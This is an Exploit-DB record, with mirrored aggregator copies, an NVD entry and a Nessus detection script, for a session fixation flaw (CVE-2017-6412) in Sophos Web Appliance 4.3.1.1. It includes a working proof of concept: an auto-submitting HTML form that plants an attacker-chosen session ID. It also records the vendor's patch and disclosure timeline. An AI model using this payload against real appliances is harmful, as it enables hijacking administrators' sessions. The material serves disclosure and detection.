ID EDB-ID:42012 Type exploitdb Reporter Exploit-DB Modified 2017-02-28T00:00:00
Description
Sophos Web Appliance 4.3.1.1 - Session Fixation. CVE-2017-6412. Webapps exploit for Hardware platform
# Exploit Title: [Sophos Secure Web Appliance Session Fixation Vulnerability]
# Date: [28/02/2017]
# Exploit Author: [SlidingWindow] , Twitter: @Kapil_Khot
# Vendor Homepage: [https://www.sophos.com/en-us/products/secure-web-gateway.aspx]
# Version: [Tested on Sophos Web Appliance version 4.3.1.1. Older versions may also be affected]
# Tested on: [Sophos Web Appliance version 4.3.1.1]
# CVE : [CVE-2017-6412]
# Vendor Security Bulletin: http://wsa.sophos.com/rn/swa/concepts/ReleaseNotes_4.3.1.2.html
==================
#Product:-
==================
Sophos Secure Web Appliance is a purpose-built secure web gateway appliance which makes web protection simple. It provides advanced protection from today’s sophisticated web malware with lightning performance that won’t slow users down. You get full control and instant insights over all web activity on your network.
==================
#Vulnerabilities:-
==================
Session Fixation Vulnerability
========================
#Vulnerability Details:-
========================
#1. Session Fixation Vulnerability (CVE-2017-6412)
A remote attacker could host a malicious page on his website that makes POST request to the victim’s Sophos Web Appliance to set the Session ID using STYLE parameter. The appliance does not validate if the Session ID sent by user/browser was issued by itself or fixed by an attacker.
Also, the appliance does not invalidate pre-login Session IDs it issued earlier once user logs in successfully. It continues to use the same pre-login Session ID instead of invalidating it and issuing a new one.
Note: An attacker would have to guess/know the IP address of the victim's device
Proof-of-Concept:
1.Visit the Sophos Login page to obtain pre-auth Session ID.
2.Host following webpage on attacking machine with the Session ID obtained in #1. It can be changed a little bit.
<html>
<body>
<form name="Sophos_Login"action="https://192.168.253.147/index.php?c=login" method="POST" >
<input type="hidden" name="STYLE" value="Pre-Auth Session ID">
</form>
<script>
window.onload = function(){
document.forms['Sophos_Login'].submit()
}
</script>
</body>
</html>
3. Visit the above page another machine.
4. You will be redirected to the login page, however Session ID will be the same.
5. Log into the appliance and check the Session ID, it will be the same from #1.
====================================
#Vulnerability Disclosure Timeline:
====================================
28/02/2017: First email to disclose the vulnerability to the vendor
28/02/2017: Vendor requested a vulnerability report
28/02/2017: Report sent to vendor.
28/02/2017: Vendor validated the report and confirmed the vulnerability
01/03/2017: CVE MITRE assigned CVE-2017-6412 to this vulnerability
03/03/2017: Vendor confirms that the fix is ready and is in the process of testing.
09/03/2017: Vendor confirmed that the patch will be released on March 17 2017 and requested to hold off publishing the CVE until March 31 2017.
17/03/2017: Vendor released the patch: http://wsa.sophos.com/rn/swa/concepts/ReleaseNotes_4.3.1.2.html
31/03/2017: Published CVE as agreed by vendor
{"id": "EDB-ID:42012", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Sophos Web Appliance 4.3.1.1 - Session Fixation", "description": "Sophos Web Appliance 4.3.1.1 - Session Fixation. CVE-2017-6412. Webapps exploit for Hardware platform", "published": "2017-02-28T00:00:00", "modified": "2017-02-28T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/42012/", "reporter": "Exploit-DB", "references": [], "cvelist": ["CVE-2017-6412"], "lastseen": "2017-05-16T14:48:58", "viewCount": 3, "enchantments": {"score": {"value": 5.0, "vector": "NONE", "modified": "2017-05-16T14:48:58", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-6412"]}, {"type": "zdt", "idList": ["1337DAY-ID-27778"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142551"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:4400635FA33B27D5BFAF224F7320E91C"]}, {"type": "nessus", "idList": ["SOPHOS_WEB_APPLIANCE_WSA_BUILD_2678661.NASL"]}], "modified": "2017-05-16T14:48:58", "rev": 2}, "vulnersScore": 5.0}, "sourceHref": "https://www.exploit-db.com/download/42012/", "sourceData": "# Exploit Title: [Sophos Secure Web Appliance Session Fixation Vulnerability]\r\n# Date: [28/02/2017]\r\n# Exploit Author: [SlidingWindow] , Twitter: @Kapil_Khot\r\n# Vendor Homepage: [https://www.sophos.com/en-us/products/secure-web-gateway.aspx]\r\n# Version: [Tested on Sophos Web Appliance version 4.3.1.1. Older versions may also be affected]\r\n# Tested on: [Sophos Web Appliance version 4.3.1.1]\r\n# CVE : [CVE-2017-6412]\r\n# Vendor Security Bulletin: http://wsa.sophos.com/rn/swa/concepts/ReleaseNotes_4.3.1.2.html\r\n\r\n==================\r\n#Product:-\r\n==================\r\nSophos Secure Web Appliance is a purpose-built secure web gateway appliance which makes web protection simple. It provides advanced protection from today\u2019s sophisticated web malware with lightning performance that won\u2019t slow users down. You get full control and instant insights over all web activity on your network.\r\n\r\n==================\r\n#Vulnerabilities:-\r\n==================\r\nSession Fixation Vulnerability\r\n\r\n========================\r\n#Vulnerability Details:-\r\n========================\r\n\r\n#1. Session Fixation Vulnerability (CVE-2017-6412)\r\n\r\nA remote attacker could host a malicious page on his website that makes POST request to the victim\u2019s Sophos Web Appliance to set the Session ID using STYLE parameter. The appliance does not validate if the Session ID sent by user/browser was issued by itself or fixed by an attacker.\r\n\r\nAlso, the appliance does not invalidate pre-login Session IDs it issued earlier once user logs in successfully. It continues to use the same pre-login Session ID instead of invalidating it and issuing a new one.\r\n\r\nNote: An attacker would have to guess/know the IP address of the victim's device\r\n\r\nProof-of-Concept:\r\n\r\n1.Visit the Sophos Login page to obtain pre-auth Session ID.\r\n\r\n2.Host following webpage on attacking machine with the Session ID obtained in #1. It can be changed a little bit.\r\n\r\n<html>\r\n<body>\r\n <form name=\"Sophos_Login\"action=\"https://192.168.253.147/index.php?c=login\" method=\"POST\" >\r\n <input type=\"hidden\" name=\"STYLE\" value=\"Pre-Auth Session ID\">\r\n </form>\r\n\r\n <script>\r\n window.onload = function(){\r\n document.forms['Sophos_Login'].submit()\r\n }\r\n </script>\r\n</body>\r\n</html>\r\n\r\n3. Visit the above page another machine.\r\n\r\n4. You will be redirected to the login page, however Session ID will be the same.\r\n\r\n5. Log into the appliance and check the Session ID, it will be the same from #1.\r\n\r\n\r\n====================================\r\n#Vulnerability Disclosure Timeline:\r\n====================================\r\n\r\n28/02/2017: First email to disclose the vulnerability to the vendor\r\n28/02/2017: Vendor requested a vulnerability report\r\n28/02/2017: Report sent to vendor.\r\n28/02/2017: Vendor validated the report and confirmed the vulnerability\r\n01/03/2017: CVE MITRE assigned CVE-2017-6412 to this vulnerability\r\n03/03/2017: Vendor confirms that the fix is ready and is in the process of testing.\r\n09/03/2017: Vendor confirmed that the patch will be released on March 17 2017 and requested to hold off publishing the CVE until March 31 2017.\r\n17/03/2017: Vendor released the patch: http://wsa.sophos.com/rn/swa/concepts/ReleaseNotes_4.3.1.2.html\r\n31/03/2017: Published CVE as agreed by vendor\r\n", "osvdbidlist": [], "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T06:36:48", "description": "In Sophos Web Appliance (SWA) before 4.3.1.2, Session Fixation could occur, aka NSWA-1310.", "edition": 6, "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-03-30T17:59:00", "title": "CVE-2017-6412", "type": "cve", "cwe": ["CWE-384"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6412"], "modified": "2017-04-15T01:59:00", "cpe": ["cpe:/a:sophos:web_appliance:4.3.1.1"], "id": "CVE-2017-6412", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-6412", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:sophos:web_appliance:4.3.1.1:*:*:*:*:*:*:*"]}], "zdt": [{"lastseen": "2018-02-19T23:24:27", "description": "Exploit for hardware platform in category web applications", "edition": 1, "published": "2017-05-17T00:00:00", "type": "zdt", "title": "Sophos Web Appliance 4.3.1.1 - Session Fixation Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-6412"], "modified": "2017-05-17T00:00:00", "href": "https://0day.today/exploit/description/27778", "id": "1337DAY-ID-27778", "sourceData": "# Exploit Title: [Sophos Secure Web Appliance Session Fixation Vulnerability]\r\n# Date: [28/02/2017]\r\n# Exploit Author: [SlidingWindow] , Twitter: @Kapil_Khot\r\n# Vendor Homepage: [https://www.sophos.com/en-us/products/secure-web-gateway.aspx]\r\n# Version: [Tested on Sophos Web Appliance version 4.3.1.1. Older versions may also be affected]\r\n# Tested on: [Sophos Web Appliance version 4.3.1.1]\r\n# CVE : [CVE-2017-6412]\r\n# Vendor Security Bulletin: http://wsa.sophos.com/rn/swa/concepts/ReleaseNotes_4.3.1.2.html\r\n \r\n==================\r\n#Product:-\r\n==================\r\nSophos Secure Web Appliance is a purpose-built secure web gateway appliance which makes web protection simple. It provides advanced protection from today\u2019s sophisticated web malware with lightning performance that won\u2019t slow users down. You get full control and instant insights over all web activity on your network.\r\n \r\n==================\r\n#Vulnerabilities:-\r\n==================\r\nSession Fixation Vulnerability\r\n \r\n========================\r\n#Vulnerability Details:-\r\n========================\r\n \r\n#1. Session Fixation Vulnerability (CVE-2017-6412)\r\n \r\nA remote attacker could host a malicious page on his website that makes POST request to the victim\u2019s Sophos Web Appliance to set the Session ID using STYLE parameter. The appliance does not validate if the Session ID sent by user/browser was issued by itself or fixed by an attacker.\r\n \r\nAlso, the appliance does not invalidate pre-login Session IDs it issued earlier once user logs in successfully. It continues to use the same pre-login Session ID instead of invalidating it and issuing a new one.\r\n \r\nNote: An attacker would have to guess/know the IP address of the victim's device\r\n \r\nProof-of-Concept:\r\n \r\n1.Visit the Sophos Login page to obtain pre-auth Session ID.\r\n \r\n2.Host following webpage on attacking machine with the Session ID obtained in #1. It can be changed a little bit.\r\n \r\n<html>\r\n<body>\r\n <form name=\"Sophos_Login\"action=\"https://192.168.253.147/index.php?c=login\" method=\"POST\" >\r\n <input type=\"hidden\" name=\"STYLE\" value=\"Pre-Auth Session ID\">\r\n </form>\r\n \r\n <script>\r\n window.onload = function(){\r\n document.forms['Sophos_Login'].submit()\r\n }\r\n </script>\r\n</body>\r\n</html>\r\n \r\n3. Visit the above page another machine.\r\n \r\n4. You will be redirected to the login page, however Session ID will be the same.\r\n \r\n5. Log into the appliance and check the Session ID, it will be the same from #1.\r\n \r\n \r\n====================================\r\n#Vulnerability Disclosure Timeline:\r\n====================================\r\n \r\n28/02/2017: First email to disclose the vulnerability to the vendor\r\n28/02/2017: Vendor requested a vulnerability report\r\n28/02/2017: Report sent to vendor.\r\n28/02/2017: Vendor validated the report and confirmed the vulnerability\r\n01/03/2017: CVE MITRE assigned CVE-2017-6412 to this vulnerability\r\n03/03/2017: Vendor confirms that the fix is ready and is in the process of testing.\r\n09/03/2017: Vendor confirmed that the patch will be released on March 17 2017 and requested to hold off publishing the CVE until March 31 2017.\r\n17/03/2017: Vendor released the patch: http://wsa.sophos.com/rn/swa/concepts/ReleaseNotes_4.3.1.2.html\r\n31/03/2017: Published CVE as agreed by vendor\n\n# 0day.today [2018-02-19] #", "sourceHref": "https://0day.today/exploit/27778", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2017-05-17T05:27:19", "description": "", "published": "2017-05-17T00:00:00", "type": "packetstorm", "title": "Sophos Web Appliance 4.3.1.1 Session Fixation", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-6412"], "modified": "2017-05-17T00:00:00", "id": "PACKETSTORM:142551", "href": "https://packetstormsecurity.com/files/142551/Sophos-Web-Appliance-4.3.1.1-Session-Fixation.html", "sourceData": "`# Exploit Title: [Sophos Secure Web Appliance Session Fixation Vulnerability] \n# Date: [28/02/2017] \n# Exploit Author: [SlidingWindow] , Twitter: @Kapil_Khot \n# Vendor Homepage: [https://www.sophos.com/en-us/products/secure-web-gateway.aspx] \n# Version: [Tested on Sophos Web Appliance version 4.3.1.1. Older versions may also be affected] \n# Tested on: [Sophos Web Appliance version 4.3.1.1] \n# CVE : [CVE-2017-6412] \n# Vendor Security Bulletin: http://wsa.sophos.com/rn/swa/concepts/ReleaseNotes_4.3.1.2.html \n \n================== \n#Product:- \n================== \nSophos Secure Web Appliance is a purpose-built secure web gateway appliance which makes web protection simple. It provides advanced protection from todayas sophisticated web malware with lightning performance that wonat slow users down. You get full control and instant insights over all web activity on your network. \n \n================== \n#Vulnerabilities:- \n================== \nSession Fixation Vulnerability \n \n======================== \n#Vulnerability Details:- \n======================== \n \n#1. Session Fixation Vulnerability (CVE-2017-6412) \n \nA remote attacker could host a malicious page on his website that makes POST request to the victimas Sophos Web Appliance to set the Session ID using STYLE parameter. The appliance does not validate if the Session ID sent by user/browser was issued by itself or fixed by an attacker. \n \nAlso, the appliance does not invalidate pre-login Session IDs it issued earlier once user logs in successfully. It continues to use the same pre-login Session ID instead of invalidating it and issuing a new one. \n \nNote: An attacker would have to guess/know the IP address of the victim's device \n \nProof-of-Concept: \n \n1.Visit the Sophos Login page to obtain pre-auth Session ID. \n \n2.Host following webpage on attacking machine with the Session ID obtained in #1. It can be changed a little bit. \n \n<html> \n<body> \n<form name=\"Sophos_Login\"action=\"https://192.168.253.147/index.php?c=login\" method=\"POST\" > \n<input type=\"hidden\" name=\"STYLE\" value=\"Pre-Auth Session ID\"> \n</form> \n \n<script> \nwindow.onload = function(){ \ndocument.forms['Sophos_Login'].submit() \n} \n</script> \n</body> \n</html> \n \n3. Visit the above page another machine. \n \n4. You will be redirected to the login page, however Session ID will be the same. \n \n5. Log into the appliance and check the Session ID, it will be the same from #1. \n \n \n==================================== \n#Vulnerability Disclosure Timeline: \n==================================== \n \n28/02/2017: First email to disclose the vulnerability to the vendor \n28/02/2017: Vendor requested a vulnerability report \n28/02/2017: Report sent to vendor. \n28/02/2017: Vendor validated the report and confirmed the vulnerability \n01/03/2017: CVE MITRE assigned CVE-2017-6412 to this vulnerability \n03/03/2017: Vendor confirms that the fix is ready and is in the process of testing. \n09/03/2017: Vendor confirmed that the patch will be released on March 17 2017 and requested to hold off publishing the CVE until March 31 2017. \n17/03/2017: Vendor released the patch: http://wsa.sophos.com/rn/swa/concepts/ReleaseNotes_4.3.1.2.html \n31/03/2017: Published CVE as agreed by vendor \n \n`\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/142551/sophoswebappliance4311-fixation.txt"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:49", "description": "\nSophos Web Appliance 4.3.1.1 - Session Fixation", "edition": 1, "published": "2017-02-28T00:00:00", "title": "Sophos Web Appliance 4.3.1.1 - Session Fixation", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-6412"], "modified": "2017-02-28T00:00:00", "id": "EXPLOITPACK:4400635FA33B27D5BFAF224F7320E91C", "href": "", "sourceData": "# Exploit Title: [Sophos Secure Web Appliance Session Fixation Vulnerability]\n# Date: [28/02/2017]\n# Exploit Author: [SlidingWindow] , Twitter: @Kapil_Khot\n# Vendor Homepage: [https://www.sophos.com/en-us/products/secure-web-gateway.aspx]\n# Version: [Tested on Sophos Web Appliance version 4.3.1.1. Older versions may also be affected]\n# Tested on: [Sophos Web Appliance version 4.3.1.1]\n# CVE : [CVE-2017-6412]\n# Vendor Security Bulletin: http://wsa.sophos.com/rn/swa/concepts/ReleaseNotes_4.3.1.2.html\n\n==================\n#Product:-\n==================\nSophos Secure Web Appliance is a purpose-built secure web gateway appliance which makes web protection simple. It provides advanced protection from today\u2019s sophisticated web malware with lightning performance that won\u2019t slow users down. You get full control and instant insights over all web activity on your network.\n\n==================\n#Vulnerabilities:-\n==================\nSession Fixation Vulnerability\n\n========================\n#Vulnerability Details:-\n========================\n\n#1. Session Fixation Vulnerability (CVE-2017-6412)\n\nA remote attacker could host a malicious page on his website that makes POST request to the victim\u2019s Sophos Web Appliance to set the Session ID using STYLE parameter. The appliance does not validate if the Session ID sent by user/browser was issued by itself or fixed by an attacker.\n\nAlso, the appliance does not invalidate pre-login Session IDs it issued earlier once user logs in successfully. It continues to use the same pre-login Session ID instead of invalidating it and issuing a new one.\n\nNote: An attacker would have to guess/know the IP address of the victim's device\n\nProof-of-Concept:\n\n1.Visit the Sophos Login page to obtain pre-auth Session ID.\n\n2.Host following webpage on attacking machine with the Session ID obtained in #1. It can be changed a little bit.\n\n<html>\n<body>\n <form name=\"Sophos_Login\"action=\"https://192.168.253.147/index.php?c=login\" method=\"POST\" >\n <input type=\"hidden\" name=\"STYLE\" value=\"Pre-Auth Session ID\">\n </form>\n\n <script>\n window.onload = function(){\n document.forms['Sophos_Login'].submit()\n }\n </script>\n</body>\n</html>\n\n3. Visit the above page another machine.\n\n4. You will be redirected to the login page, however Session ID will be the same.\n\n5. Log into the appliance and check the Session ID, it will be the same from #1.\n\n\n====================================\n#Vulnerability Disclosure Timeline:\n====================================\n\n28/02/2017: First email to disclose the vulnerability to the vendor\n28/02/2017: Vendor requested a vulnerability report\n28/02/2017: Report sent to vendor.\n28/02/2017: Vendor validated the report and confirmed the vulnerability\n01/03/2017: CVE MITRE assigned CVE-2017-6412 to this vulnerability\n03/03/2017: Vendor confirms that the fix is ready and is in the process of testing.\n09/03/2017: Vendor confirmed that the patch will be released on March 17 2017 and requested to hold off publishing the CVE until March 31 2017.\n17/03/2017: Vendor released the patch: http://wsa.sophos.com/rn/swa/concepts/ReleaseNotes_4.3.1.2.html\n31/03/2017: Published CVE as agreed by vendor", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-04-01T06:24:39", "description": "According to its self-reported build number, the Sophos Web Appliance\nrunning on the remote host is prior to 4.3.1.2. It is, therefore,\naffected by following vulnerabilities :\n\n - A remote command injection vulnerability exists due to a\n failure in certain functions to properly sanitize input\n upon submission to reports. An authenticated, remote\n attacker can exploit this to inject arbitrary commands.\n (CVE-2017-6182)\n\n - A remote command injection vulnerability exists due to\n improper handling of parameters in the active directory\n configuration. An authenticated, remote attacker can\n exploit this to inject arbitrary commands.\n (CVE-2017-6183)\n\n - A remote command injection vulnerability exists due to a\n failure to properly sanitize input passed via the\n 'token' parameter upon submission to reports. An\n authenticated, remote attacker can exploit this to\n inject arbitrary commands. (CVE-2017-6184)\n\n - An authentication bypass vulnerability exists due to the\n use of static session IDs. An unauthenticated, remote \n attacker can exploit this to bypass authentication.\n (CVE-2017-6412)\n\n - A remote command injection vulnerability exists due to a\n failure to properly sanitize unspecified HTTP request\n parameters upon submission to reports. An\n authenticated, remote attacker can exploit this to\n execute arbitrary commands.", "edition": 32, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-04-06T00:00:00", "title": "Sophos Web Appliance < 4.3.1.2 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-6184", "CVE-2017-6183", "CVE-2017-6182", "CVE-2017-6412"], "modified": "2021-04-02T00:00:00", "cpe": ["cpe:/a:sophos:web_appliance"], "id": "SOPHOS_WEB_APPLIANCE_WSA_BUILD_2678661.NASL", "href": "https://www.tenable.com/plugins/nessus/99237", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99237);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\n \"CVE-2017-6182\",\n \"CVE-2017-6183\",\n \"CVE-2017-6184\",\n \"CVE-2017-6412\"\n );\n script_bugtraq_id(97261);\n\n script_name(english:\"Sophos Web Appliance < 4.3.1.2 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the build number of Sophos Web Appliance.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is running a web application that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported build number, the Sophos Web Appliance\nrunning on the remote host is prior to 4.3.1.2. It is, therefore,\naffected by following vulnerabilities :\n\n - A remote command injection vulnerability exists due to a\n failure in certain functions to properly sanitize input\n upon submission to reports. An authenticated, remote\n attacker can exploit this to inject arbitrary commands.\n (CVE-2017-6182)\n\n - A remote command injection vulnerability exists due to\n improper handling of parameters in the active directory\n configuration. An authenticated, remote attacker can\n exploit this to inject arbitrary commands.\n (CVE-2017-6183)\n\n - A remote command injection vulnerability exists due to a\n failure to properly sanitize input passed via the\n 'token' parameter upon submission to reports. An\n authenticated, remote attacker can exploit this to\n inject arbitrary commands. (CVE-2017-6184)\n\n - An authentication bypass vulnerability exists due to the\n use of static session IDs. An unauthenticated, remote \n attacker can exploit this to bypass authentication.\n (CVE-2017-6412)\n\n - A remote command injection vulnerability exists due to a\n failure to properly sanitize unspecified HTTP request\n parameters upon submission to reports. An\n authenticated, remote attacker can exploit this to\n execute arbitrary commands.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://swa.sophos.com/rn/swa/concepts/ReleaseNotes_4.3.1.2.html\");\n # https://community.sophos.com/products/web-appliance/b/blog/posts/release-of-swa-v4-3-1-2\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?10940469\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Sophos Web Appliance version 4.3.1.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-6182\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Sophos Web Protection Appliance Reports RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/04/06\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:sophos:web_appliance\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"sophos_web_protection_detect.nasl\");\n script_require_keys(\"installed_sw/sophos_web_protection\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 443);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\n# WSA_BUILD 2678661 -> v4.3.1.2 mapping is only seen in\n# virtual appliance. The WSA_BUILD-version mapping is not\n# observed in physical appliance. \nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\napp = 'sophos_web_protection';\nget_install_count(app_name:app, exit_if_zero:TRUE);\nport = get_http_port(default:443);\ninstall = get_single_install(app_name:app, port:port);\n\nbuild = install['WSA_BUILD'];\nif(isnull(build))\n exit(1, 'Failed to get the Sophos Web Appliance WSA_BUILD number.');\n\ndir = install['dir'];\nurl = build_url(qs:dir, port:port);\n\nfix = 2678661; # v4.3.1.2\nif (build < fix)\n{\n report =\n '\\n URL : ' + url +\n '\\n Installed WSA_BUILD : ' + build +\n '\\n Fixed WSA_BUILD : ' + fix + ' (v4.3.1.2)\\n';\n\n security_report_v4(port:port, extra:report, severity:SECURITY_HOLE);\n}\nelse \n{\n audit(AUDIT_WEB_APP_NOT_AFFECTED, 'Sophos Web Appliance', url);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}